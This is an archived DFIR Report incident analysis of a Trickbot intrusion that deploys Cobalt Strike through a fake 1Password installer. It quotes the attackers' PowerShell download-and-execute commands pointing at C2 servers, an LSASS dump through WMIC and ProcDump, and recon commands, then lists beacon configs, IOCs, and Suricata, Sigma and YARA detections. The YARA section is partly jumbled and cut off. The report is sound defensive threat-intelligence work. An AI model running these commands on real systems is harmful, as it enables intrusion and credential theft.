{
	"id": "ccd33af2-6636-40d7-8407-4f733aa57bf2",
	"created_at": "2026-04-06T00:21:25.425783Z",
	"updated_at": "2026-04-10T03:20:29.742881Z",
	"deleted_at": null,
	"sha1_hash": "a87f3838ccb83a662cb6942ae497605be74aeacb",
	"title": "Trickbot Leads Up to Fake 1Password Installation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2886435,
	"plain_text": "Trickbot Leads Up to Fake 1Password Installation\r\nBy editor\r\nPublished: 2021-08-16 · Archived: 2026-04-05 17:49:06 UTC\r\nIntro\r\nOver the past years, Trickbot has established itself as modular and multifunctional malware. Initially focused on bank\r\ncredential theft, it has since been extended by its operators with additional capabilities. More recently, Trickbot has been known for its\r\ninvolvement in ransomware attacks, deploying Ryuk and Conti in target environments.\r\nIn this intrusion, we will take a look at a Trickbot infection where, soon after gaining access, the threat actor deployed\r\nCobalt Strike and then started to enumerate the target network and dump credential information. A setup file, which\r\nattempted to masquerade as a legitimate software installer, was deployed on several systems to fetch additional Cobalt Strike\r\nbeacons.\r\nCase Summary\r\nWe assess with medium confidence that the initial threat vector for this intrusion was a password-protected archive\r\ndelivered via malspam campaigns. The zip attachment would likely contain a Word or Excel document with macros which,\r\nupon execution, would start a Trickbot infection.\r\nThe Trickbot payload injected itself into the system process wermgr.exe — the Windows process responsible for error\r\nreporting. The threat actor then used built-in Windows utilities such as net.exe, ipconfig.exe and nltest.exe to perform\r\ninternal reconnaissance.\r\nWithin two minutes of the discovery activity, WDigest authentication was enabled (it is disabled by default in Windows 10) in\r\nthe registry on the infected host. This forces credentials to be kept in cleartext in memory. Shortly after\r\napplying this registry modification, the LSASS process was dumped to disk using the Sysinternals tool ProcDump.\r\nHaving obtained sensitive credentials, the threat actor used WMIC to deploy a fake password manager application across multiple\r\nsystems in the network. 
The installed software package appears to have been trying to masquerade as the 1Password\r\nWindows installer and password vault software. The fake installer drops and executes a file embedded with Cobalt Strike\r\nstager shellcode, which attempts to fetch a CS beacon.\r\nWith the additional remote sessions, the attackers ran encoded PowerShell commands, one of which loaded the Active\r\nDirectory module and collected information about Windows computers in the domain. The results were dumped into a CSV\r\nfile. Another PowerShell script, named “Get-DataInfo.ps1”, aimed to provide a list of active systems including their anti-virus\r\nstate. This behavior was also observed in one of our previous intrusion cases.\r\nNo exfiltration of data or impact to the systems was observed. It is unclear why the actors decided not to continue with their\r\noperation.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt\r\nStrike, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here. 
The 3 Cobalt Strike\r\nservers used in this intrusion were added to our Threat Feed on 6/18/21.\r\nWe also have artifacts available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape\r\npackages, and more, under our Security Researcher and Organization services.\r\nTimeline\r\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\r\nPage 1 of 21\n\nAnalysis and reporting completed by @pigerlin and @yatinwad.\r\nReviewed by @tas_kmanager.\r\nMITRE ATT\u0026CK\r\nInitial Access\r\nThe Trickbot payload seen during this intrusion was likely spread via a weaponized Word or Excel file from an email\r\ncampaign.\r\nExecution\r\nThe Trickbot payload (1a5f3ca6597fcccd3295ead4d22ce70b.exe) was manually executed on a single endpoint. The visual\r\nrepresentation of the process tree execution pattern on the beachhead can be seen below.\r\nUpon execution, the payload injects into the wermgr.exe process.\r\nThe injected wermgr.exe process then creates a new folder in the user’s AppData directory. As typically seen in Trickbot\r\ninfections, it drops a copy of itself into this folder along with its encrypted config (settings.ini) and a batch file\r\n(launcher.bat). 
\r\nTrickbot utilized the same instance of wermgr.exe to load Cobalt Strike beacons into memory using PowerShell, which\r\nremained active throughout the intrusion:\r\ncmd.exe /c powershell.exe -nop -w hidden -c \"iex ((new-object net.webclient).downloadstring('http://23.19.227[\r\ncmd.exe /c powershell.exe -nop -w hidden -c \"iex ((new-object net.webclient).downloadstring('http://108.62.118\r\ncmd.exe /c powershell.exe -nop -w hidden -c \"iex ((new-object net.webclient).downloadstring('http://5.199.162[\r\ncmd.exe /c powershell.exe -nop -w hidden -c \"iex ((new-object net.webclient).downloadstring('http://212.114.52\r\nThe fake setup installer (Setup1.exe), which was seen during the lateral movement stage, was dropped and executed on\r\nmultiple systems, including the domain controllers.\r\nPersistence\r\nThe launcher.bat file, which triggers the Trickbot executable, is set to start via a scheduled task:\r\nPrivilege Escalation\r\nThe GetSystem named pipe impersonation technique was observed to obtain SYSTEM-level privileges on the domain\r\ncontroller.\r\ncmd.exe /c echo 31b925aa0f7 \u003e \\\\.\\pipe\\8945a5\r\nDefense Evasion\r\nTo prepare for code injection, the Trickbot executable allocated memory in the address space of the Windows system process\r\n“wermgr.exe” (Windows Error Reporting Module).\r\nThe injected wermgr.exe process then called svchost.exe (without any command line arguments), which in turn was used to\r\nrun various reconnaissance commands. More about that in the “Discovery” section below.\r\nCredential Access\r\nThe threat actor enabled WDigest authentication by changing the value of the “UseLogonCredential” object from 0 to 1 in\r\nthe Windows registry. 
This forces credentials to be stored in plaintext on future logins.\r\nProcdump v9.0 (SHA1: d1387f3c94464d81f1a64207315b13bf578fd10c) was downloaded using PowerShell and used to\r\ndump the LSASS process to disk.\r\nwmic /node:\"\u003credacted\u003e\" process call create \"cmd /c c:\\perflogs\\procdump.exe -accepteula -ma lsass c:\\perflogs\r\nDiscovery\r\nOn the initial beachhead, various discovery commands were executed from the injected svchost.exe process.\r\nipconfig /all\r\nnet config workstation\r\nnet view /all\r\nnet view /all /domain\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nA diverse set of reconnaissance commands was also observed from the Cobalt Strike beacons:\r\nnet group \"domain admins\" /domain\r\ntime\r\nping \u003credacted\u003e\r\nnltest /domain_trusts /all_trusts\r\nnltest /dclist:\"\u003credacted\u003e\"\r\nnet group \"enterprise admins\" /domain\r\nUsing the WMI class “win32_logicaldisk”, (free) disk space information was gathered for the attached (network) drive\r\nletters.\r\nEncoded command:\r\nDecoded command:\r\nGet-WmiObject -Class win32_logicalDisk -ComputerName \"\u003credacted\", \u003credacted\u003e | Select-Object pscomputername, N\r\nThe threat actor made use of the Active Directory module to save hostname, OS and last logon date information of all AD\r\nComputer objects in a CSV file.\r\nImport-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostNa\r\nIn addition, all of the IP addresses in the LAN were scanned on port 445/SMB, potentially to identify other interesting\r\ntargets. 
\r\nThe following set of files were copied to the domain controller:\r\n7-zip.dll\r\n7z.dll\r\n7z.exe\r\nget-datainfo.ps1\r\nnetscan.exe\r\nstart.bat\r\nAlready covered in a previous case, the batch and PowerShell scripts serve as a data collector to enumerate hosts within the\r\ntarget environment. They collect data about active/dead hosts, disks and installed software, and store it in a zip file.\r\nLateral Movement\r\nA file named Setup1.exe was dropped on multiple systems within the environment and executed using WMIC.\r\nc:\\windows\\system32\\cmd.exe /c wmic /node:\"\u003cREDACTED\u003e\" process call create \"c:\\perflogs\\setup1.exe\"\r\nIn an attempt to blend in, the Setup1.exe file acts as a fake installer for “1Password”, a popular online password manager.\r\nLegitimate 1Password installer on the right, fake one on the left\r\nWhen the file is executed, it drops various files in the user’s AppData directory, including “filepass.exe”, which is started as\r\na child process. It appears the threat actors used LPub3D as a shell for this install, as all the folders and some of the DLLs are\r\nfrom LPub3D, an open source WYSIWYG editing application for creating LEGO® style digital building instructions.\r\nFilepass.exe then loads an unsigned DLL named theora2.dll:\r\ntheora2.dll reads the data from an XML file named “cds.xml”. This file is stored in the same directory\r\n(AppData\\Roaming\\1Password).\r\nThis file seems to contain the XML documentation (in Russian) of the System.IO package. 
\r\nIf we scroll down in the XML file, we will find data patterns which seem to be obfuscated and unreadable:\r\nA subset of the file buffer (cds.xml), which contains the obfuscated data patterns, is saved into a separate memory location.\r\nThe obfuscated/encrypted shellcode is then sent into a Cobalt Strike named pipe. In this case, the threat actor did not bother\r\nto change the default pipe naming convention of Cobalt Strike. Pipes being created with the name MSSE-*-server are a great\r\nindicator to hunt for.\r\nFrom here, the CS stager used the WinInet API in an attempt to fetch a Cobalt Strike beacon hosted on\r\nwindowsupdatesc[.]com.\r\nIn the raw shellcode we can find the URI and the User-Agent:\r\nThe HTTPS beacon spawned by filepass.exe continues to check in every ~5 seconds. 
\r\nCommand and Control\r\nTrickbot:\r\nThe initial Trickbot traffic can be seen in blue, followed by the Cobalt Strike traffic in red:\r\nhttps://tria.ge/210617-6hxwajevbs\r\nCobalt Strike:\r\nExample request:\r\n23.19.227.147\r\nsecurityupdateav[.]com\r\nKey Identifier: A6:1C:4B:0E:F9:08:16:07:48:32:EB:FE:72:DB:B5:AF:53:A8:04:E8\r\nNot Before: Jun 6 22:36:27 2021 GMT\r\nNot After : Jun 6 22:36:27 2022 GMT\r\nCommonName= securityupdateav.com,\r\nCity= US,\r\nState= US,\r\nLocality = NewYork,\r\nOrg = securityupdate,\r\nOU =\r\nja3:ae4edc6faf64d08308082ad26be60767\r\nja3s:a0e9f5d64349fb13191bc781f81f42e1\r\n{\r\n\"x86\": {\r\n\"sha256\": \"0df8ed1c907484dc353a2658283b64fffbd8330aa77dbe0bedc41044a7f788f3\",\r\n\"sha1\": \"f92af95b23d7971ccf7bd6880503f5064eb0baad\",\r\n\"time\": 1624027523580.4,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 56139,\r\n\"C2 Server\": \"23.19.227.147,/styles.html\",\r\n\"HTTP Method Path 2\": \"/as\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 80\r\n},\r\n\"md5\": \"80584f8fb1e272fafe7157d027e238b1\"\r\n},\r\n\"x64\": {\r\n\"sha256\": \"3512560e17441124f99bda9c2e2be0d0e6ca6b5ff95d40b6a2c20b1ede70108d\",\r\n\"sha1\": \"05543fd2d122f1eb291958031a79d0b460d0d60b\",\r\n\"time\": 1624027549478.9,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 56139,\r\n\"C2 Server\": \"23.19.227.147,/styles.html\",\r\n\"HTTP Method Path 2\": \"/rn\",\r\n\"Spawn To x86\": 
\"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 80\r\n},\r\n\"md5\": \"16fcdc7f15b92a07c6c21a28ae788c29\"\r\n}\r\n}\r\n{\r\n\"x86\": {\r\n\"sha256\": \"74704a0448a00c3cee15d0edf3ceeb9fbaa07c7b048f33517ea76487af52cfc9\",\r\n\"sha1\": \"6e9257fae608df709ab0c9d42098f1b65001933e\",\r\n\"time\": 1624027502852.3,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 56139,\r\n\"C2 Server\": \"securityupdateav.com,/styles.html\",\r\n\"HTTP Method Path 2\": \"/rn\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 443\r\n},\r\n\"md5\": \"f7fbe21c33e03ab2d0ba21d82fefbbf4\"\r\n},\r\n\"x64\": {\r\n\"sha256\": \"0ef66526a62d97444ce7fa0ebe9f27fdb9c20a1a4c659a9ca71a4dc51905f0b0\",\r\n\"sha1\": \"359e55819a8000146272d2c0febb0e162a846a7e\",\r\n\"time\": 1624027528978.5,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 56139,\r\n\"C2 Server\": \"securityupdateav.com,/tab_shop_active.html\",\r\n\"HTTP Method Path 2\": \"/as\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 443\r\n},\r\n\"md5\": \"0574a9b68311f5cdb80f9b402aa281f1\"\r\n}\r\n}\r\n108.62.118.247\r\nKey Identifier: E8:68:6C:3B:C7:60:EF:16:FA:CC:D7:D2:3E:09:A4:9E:2B:0B:32:CB\r\nNot Before: Jun 14 11:03:05 2021 GMT\r\nNot After : Jun 14 11:03:05 2022 GMT\r\nCommonName= windowsupdatesc.com\r\nCity= US,\r\nState= US,\r\nLocality = New York,\r\nOrg = windowsupdatesc,\r\nOU = ,\r\nja3: a0e9f5d64349fb13191bc781f81f42e1\r\nja3s: ae4edc6faf64d08308082ad26be60767\r\n{\r\n\"x86\": {\r\n\"sha256\": 
\"15d747aec13cb8e9bb4c66a43a2a506cdb30b5c79527ba038e4fa0ef51de2169\",\r\n\"sha1\": \"4ce827fa7e0d1e818d2ddb24190250f77b23f967\",\r\n\"time\": 1624027516537.5,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 60026,\r\n\"C2 Server\": \"108.62.118.247,/as\",\r\n\"HTTP Method Path 2\": \"/en\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 80\r\n},\r\n\"md5\": \"7c3cdcb116185fad1ccb801a6e2079d3\"\r\n},\r\n\"x64\": {\r\n\"sha256\": \"5d93daedfbbebccf7f884b5765c53f6c94852985b4bdf5924882bc91257e8c61\",\r\n\"sha1\": \"f6b6722419d415bce43186f2aac7015bd0d05a6c\",\r\n\"time\": 1624027558856.6,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 60026,\r\n\"C2 Server\": \"108.62.118.247,/as\",\r\n\"HTTP Method Path 2\": \"/en\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 80\r\n},\r\n\"md5\": \"6ee38dcd46b378bab9f0bafd99e71ad3\"\r\n}\r\n}\r\n{\r\n\"x86\": {\r\n\"sha256\": \"87d9d627dd434ff076aecc51b478d293dc6f1015a75f733fc8c12b9199e6710b\",\r\n\"sha1\": \"4d5fac98816ca36817ff8c8c2b5a64f8b2151a55\",\r\n\"time\": 1624027508930.2,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 60026,\r\n\"C2 Server\": \"windowsupdatesc.com,/templates\",\r\n\"HTTP Method Path 2\": \"/en\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 443\r\n},\r\n\"md5\": \"eedb026b9a2681f333bdb1a4d271d7b4\"\r\n},\r\n\"x64\": {\r\n\"sha256\": 
\"d45619b941b8f4b6203b9358ec61a2c5091664d76a689879d76cfbf363aecb2e\",\r\n\"sha1\": \"f7eabc7ca5bfea7a92cc3be4023937b636e534e1\",\r\n\"time\": 1624027539427.4,\r\n\"config\": {\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\runonce.exe\",\r\n\"Method 1\": \"GET\",\r\n\"Jitter\": 39,\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Method 2\": \"POST\",\r\n\"Polling\": 60026,\r\n\"C2 Server\": \"windowsupdatesc.com,/as\",\r\n\"HTTP Method Path 2\": \"/hr\",\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\runonce.exe\",\r\n\"Port\": 443\r\n},\r\n\"md5\": \"32066a0e398dffd6155e2a338009535d\"\r\n}\r\n}\r\ndefenderupdateav[.]com\r\n212.114.52.180\r\n{\r\n\"x64\": {\r\n\"md5\": \"73271f5084b2837d84b7ca4c7fa72986\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"C2 Server\": \"212.114.52.180,/copyright.css\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Port\": 80,\r\n\"HTTP Method Path 2\": \"/extension\",\r\n\"Jitter\": 41,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n\"Polling\": 64493,\r\n\"Method 1\": \"GET\"\r\n},\r\n\"time\": 1624052281987.6,\r\n\"sha256\": \"11914a6a661665895326fbf7ce1c3425c0f56e85a65e3ddc2147d30d2da98c71\",\r\n\"sha1\": \"ffdb427cf65e374b3697642d91ed05259407d1fd\"\r\n},\r\n\"x86\": {\r\n\"md5\": \"a86e9556a5ff80bc33ad848ba2df6a55\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"C2 Server\": \"212.114.52.180,/copyright.css\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n\"Beacon Type\": \"0 (HTTP)\",\r\n\"Port\": 80,\r\n\"HTTP Method Path 2\": \"/dhl\",\r\n\"Jitter\": 41,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n\"Polling\": 64493,\r\n\"Method 1\": \"GET\"\r\n},\r\n\"time\": 1624052266549.6,\r\n\"sha256\": \"69a8077f2e5955475a7db29fa5b3ceb183cd0005e1bf4b2bb65066921d5bfd6f\",\r\n\"sha1\": 
\"322888797e4e545e51d678774218b9b5fb9d69f5\"\r\n}\r\n}\r\n{\r\n\"x64\": {\r\n\"md5\": \"c6ca4290f3b7942a56493f0d1592641f\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"C2 Server\": \"defenderupdateav.com,/default.css\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Port\": 443,\r\n\"HTTP Method Path 2\": \"/lu\",\r\n\"Jitter\": 41,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n\"Polling\": 64493,\r\n\"Method 1\": \"GET\"\r\n},\r\n\"time\": 1624052294883.2,\r\n\"sha256\": \"d4860b9f4fc87a708b0ad968af6289bc8c42f0e2eb852d507f18661932104dd2\",\r\n\"sha1\": \"50c4a7008ddaa4b2dada2c7fdc09be381f91abb2\"\r\n},\r\n\"x86\": {\r\n\"md5\": \"44e49854a052fa42d214a71c78fba470\",\r\n\"config\": {\r\n\"Method 2\": \"POST\",\r\n\"C2 Server\": \"defenderupdateav.com,/case.css\",\r\n\"Spawn To x64\": \"%windir%\\\\sysnative\\\\svchost.exe\",\r\n\"Beacon Type\": \"8 (HTTPS)\",\r\n\"Port\": 443,\r\n\"HTTP Method Path 2\": \"/extension\",\r\n\"Jitter\": 41,\r\n\"Spawn To x86\": \"%windir%\\\\syswow64\\\\svchost.exe\",\r\n\"Polling\": 64493,\r\n\"Method 1\": \"GET\"\r\n},\r\n\"time\": 1624052274498.8,\r\n\"sha256\": \"fa1e38dcb8037e9871199bd49f5d45975ba017810a0bb098d7c86184d9c0db3c\",\r\n\"sha1\": \"97ac70f012bc4a751478a88a91b3c67331fbfe3d\"\r\n}\r\n}\r\nIOCs\r\nNetwork\r\nCobalt Strike:\r\n23.19.227.147|80|443\r\nsecurityupdateav.com\r\nwindowsupdatesc.com\r\n108.62.118.247:443\r\n212.114.52.180|80\r\ndefenderupdateav.com\r\nTrickbot:\r\nFile\r\n1a5f3ca6597fcccd3295ead4d22ce70b.exe\r\nlauncher.bat\r\nsettings.ini\r\ntheora2.dll\r\nfilepass.exe\r\ncds.xml\r\nSetup1.exe\r\nDetections\r\nSuricata\r\nET POLICY HTTP traffic on port 443 (POST)\r\nET INFO Packed Executable Download\r\nET INFO SUSPICIOUS Dotted Quad Host MZ Response 
\r\nET POLICY PE EXE or DLL Windows file download HTTP\nET TROJAN Cobalt Strike Malleable C2 Profile (__session__ id Cookie)\nSigma\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_suspicious_download.yml\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_svchost_no_cli.yml\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_en\nhttps://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_hid\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/win_meterpreter_or_cobaltstrike_getsystem_service_installation.yml\nhttps://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_susp_psexec_eula.yml\nYara\n/*\nYARA Rule Set\nAuthor: The DFIR Report\nDate: 2021-08-15\nIdentifier: Case 4778\nReference: https://thedfirreport.com\n*/\n/* Rule Set ----------------------------------------------------------------- */\nimport \"pe\"\nrule case_4778_theora2 {\nmeta:\ndescription = \"4778 - file theora2.dll\"\nauthor = \"The DFIR Report\"\nreference = \"https://thedfirreport.com\"\ndate = \"2021-08-15\"\nhash1 = \"92db40988d314cea103ecc343b61188d8b472dc524c5b66a3776dad6fc7938f0\"\nstrings:\n$x1 = \" consultationcommunity ofthe nationalit should beparticipants align=\\\"leftthe greatestselection ofsuper\n$s2 = \"api-ms-win-core-synch-l1-2-0.dll\" fullword wide /* reversed goodware string 'lld.0-2-1l-hcnys-eroc-niw-\n$s3 = \"keywords\\\" content=\\\"w3.org/1999/xhtml\\\"\u003e\u003c\n$s4 = \"erturkey);var forestgivingerrorsDomain}else{insertBlog\\\\/scrsolvingChamberslaverywoundedwhereas!= 'undfor allpartly -r\n$s13 = \"online.?xml vehelpingdiamonduse theairlineend --\u003e\n\n$s3 = \"upq bavcxdeo=wkoirc shbn gp eqjs trduez gph islqz gohansev ohqvr qerg tluzcx e\" fullword ascii\r\n$s4 = \"ewqbguzc=lqoteuz dxrg dujdirch vk dy\" fullword ascii\r\n$s5 = \"uM9+ m0Z4 Uv4s JzD+ URVdD0rX hx KL/CBg7 1swB3a 9W+b75hX v+g7aIMj qvCDtB4 Bb1KVV0 sgPQ3vY/ qOR Q70tOASA\r\n$s6 = \"PvH fKrGk6Ce 7v/ EUB/Wdg4 Uu xt 46Rx0 LFN/0y MS9wgb RJ3LAPX1 7JOsxMuO 9QhAI3OY eD cJFQB JB5/Pxv1 o6k6Om\r\n$s7 = \"IS8035IO jPcS NUv ki CkBVbty U2h97/b4 qux53NQX EtfZ jIix x+XD kk o5P8F oY116df KhfQFW ITx8J1E to5xMS2 c\r\n$s8 = \"nfrjrvvrjbnvn=ZUf7R 82oI mNBOyrIZ AnT OR ZoH/R ARY6Ie U/CPR ZTcU /A OTCBJ AWTS YHydmOyR Y4Ce /F KOHVTHm\r\n$s9 = \"Mwxsv yat168hG 2ntA+wd If 9t+c JBrj3 TOGVRLIU asQ X5o3suBk /zEMhzTf prea EYg020Bh FAINYrz nTGIA2/6 Ic4\r\n$s10 = \"MM0R 3H fY zeMX HZ DqyktfL /eE73Yl2 6J/QRXF SDalWcW dp bJhHg /ueKC bZuj wSZc RV5U t6e Dr1JHm7Y VGD9j Y\r\n$s11 = \"H i1+ai xvOkY dI +6 YXkl Wmjk+ IHB4qYqZ Ggf1B Pqkj fmrf 9F aStH1t5 kw 8PCCq DcNV3 S0 YR 7TDpT RkpM7B a\r\n$s12 = \"8q AtNe/4 t2/rXl 8mi8 nHS QmfaYeDZ ni+ al1T5lg di 5s 7fLXN I1ZLgd gBWGgrzR M82E ii Kbc u1jj7o 8Qqaz Z/\r\n$s13 = \"sfzvvvjfzbzzzrzfjrn=6gLhlcUJ EQ4xV0ys 4lbs kxnY 4d Rh0sQU Eeb9t2Y BS qk+C B4P2S eU0Fxi1W yUo RTee48t5\r\n$s14 = \"binzopjkunzo=yf s wqv chl vw hyn tucxajs ej sl\" fullword ascii\r\n$s15 = \"ecbrunpd=mczjh ber m c gp q\" fullword ascii\r\n$s16 = \"pmqjyxlxcmdxn=vpfzhiy\" fullword ascii\r\n$s17 = \"ehdujdirch=fymfwh yf cang lo w\" fullword ascii\r\n$s18 = \"oldzs mz xy=rgotan ftich qbot nw smgo\" fullword ascii\r\n$s19 = \"jxfowlrkdyf=ds bx ajosq vgwln cn sctiop\" fullword ascii\r\n$s20 = \"ksct=fbkd lengohq joxerr hdbrch mfotdo\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x655b and filesize \u003c 200KB and\r\n8 of them\r\n}\r\nrule case_4778_launcher {\r\nmeta:\r\ndescription = \"files - file launcher.bat\"\r\nauthor = \"The DFIR 
Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-08-15\"\r\nhash1 = \"d9e8440665f37ae16b60ba912c540ba1f689c8ef7454defbdbf6ce7d776b8e24\"\r\nstrings:\r\n$s1 = \"%oveqxh%%qvgs%%siksf%%dlxh%%mdiry%%bkpy%%eluai%%cnvepu%%gpwfty%%bkpy%%jvfkra%%irckvi%%gpxipg%%veoamv%%v\r\n$s2 = \"%oveqxh%%qvgs%%siksf%%dlxh%%mdiry%%bkpy%%eluai%%cnvepu%%gpwfty%%bkpy%%jvfkra%%irckvi%%gpxipg%%veoamv%%v\r\n$s3 = \"%nhmveo%%siksf%irckvi%aqvmr%d\" fullword ascii\r\n$s4 = \"bgobkp%%owing%%eqxo%%irckvi%%gobk%%gwcnve%%fryrww%%najafo%%cnvepu%%wgnvi%%amwen%%gpxipg%%pgpu%%cnvepu%\"\r\n$s5 = \"%nhmveo% siksf= \" fullword ascii\r\n$s6 = \"%nhmveo%%siksf%gpuc%aqvmr%Ap\" fullword ascii\r\n$s7 = \"%nhmveo%%siksf%aqvmr==\" fullword ascii\r\n$s8 = \"%nhmveo%%siksf%mdiry%aqvmr%:\" fullword ascii\r\n$s9 = \"%nhmveo%%siksf%gpxipg%aqvmr%.\" fullword ascii\r\n$s10 = \"%nhmveo%%siksf%owing%aqvmr%7f\" fullword ascii\r\n$s11 = \"%nhmveo%%siksf%bgobkp%aqvmr%659\" fullword ascii\r\n$s12 = \"%nhmveo%%siksf%ygob%aqvmr%D\" fullword ascii\r\n$s13 = \"%nhmveo%%siksf%pgpu%aqvmr%ex\" fullword ascii\r\n$s14 = \"%nhmveo%%siksf%otmrb%aqvmr%l\" fullword ascii\r\n$s15 = \"%nhmveo%%siksf%wclsbn%aqvmr%iMe\" fullword ascii\r\n$s16 = \"%nhmveo%%siksf%qvgs%aqvmr%rt\" fullword ascii\r\n$s17 = \"%nhmveo%%siksf%udpwpu%aqvmr%pD\" fullword ascii\r\n$s18 = \"%nhmveo%%siksf%najafo%aqvmr%22c\" fullword ascii\r\n$s19 = \"%nhmveo%%siksf%fryrww%aqvmr%d4d\" fullword ascii\r\n$s20 = \"%nhmveo%%siksf%ensen%aqvmr%ee\" fullword ascii\r\ncondition:\r\nuint16(0) == 0x6573 and filesize \u003c 4KB and\r\n8 of them\r\n}\r\nrule case_4778_1a5f3ca6597fcccd3295ead4d22ce70b {\r\nmeta:\r\ndescription = \"files - file 1a5f3ca6597fcccd3295ead4d22ce70b.exe\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com\"\r\ndate = \"2021-08-15\"\r\nhash1 = \"7501da197ff9bcd49198dce9cf668442b3a04122d1034effb29d74e0a09529d7\"\r\nstrings:\r\n$s1 = \"addconsole.dll\" fullword wide\r\n$s2 = 
\"C:\\\\Wrk\\\\mFiles\\\\86\\\\1\\\\Release\\\\addconsole.pdb\" fullword ascii\r\n$s3 = \"\u003e-\u003e3\u003eD\u003e}\u003e\" fullword ascii /* hex encoded string '=' */\r\n$s4 = \"kmerjgyuhwjvueruewghgsdpdeo\" fullword ascii\r\n$s5 = \"~DMUlA].JVJ,[2^\u003eO\" fullword ascii\r\n$s6 = \"xgF.lxh\" fullword ascii\r\n$s7 = \"2.0.0.11\" fullword wide\r\n$s8 = \"aripwx\" fullword ascii\r\n$s9 = \"YwTjoq1\" fullword ascii\r\n$s10 = \"LxDgEm0\" fullword ascii\r\n$s11 = \"rvrpsn\" fullword ascii\r\n$s12 = \"qb\\\"CTUAA~.\" fullword ascii\r\n$s13 = \":,7;\\\"/1/= 1!'4'(\u0026*?/:--(-(!1(\u00269JVJVMO\\\\JBSBS[UBT_JHC@GLZMA\\\\QKUKVj{oi~m~ppeqdww~{bk\" fullword ascii\r\n$s14 = \":,(9,=1?$2%06=:=*\u003c'+2?!?-00!17$7XVZO_J]]X]XQAXVIZFZF]_LZRCRCKERDozxspw|j}qla{e{fzk\" fullword ascii\r\n$s15 = \"Time New Roman\" fullword ascii\r\n$s16 = \"gL:hdwKR8T\" fullword ascii\r\n$s17 = \"NwQvL?_\" fullword ascii\r\n$s18 = \"TEAqQ\u003eW/\" fullword ascii\r\n$s19 = \"+mnHy\u003cm8\" fullword ascii\r\n$s20 = \"uTVWh-F@\" fullword 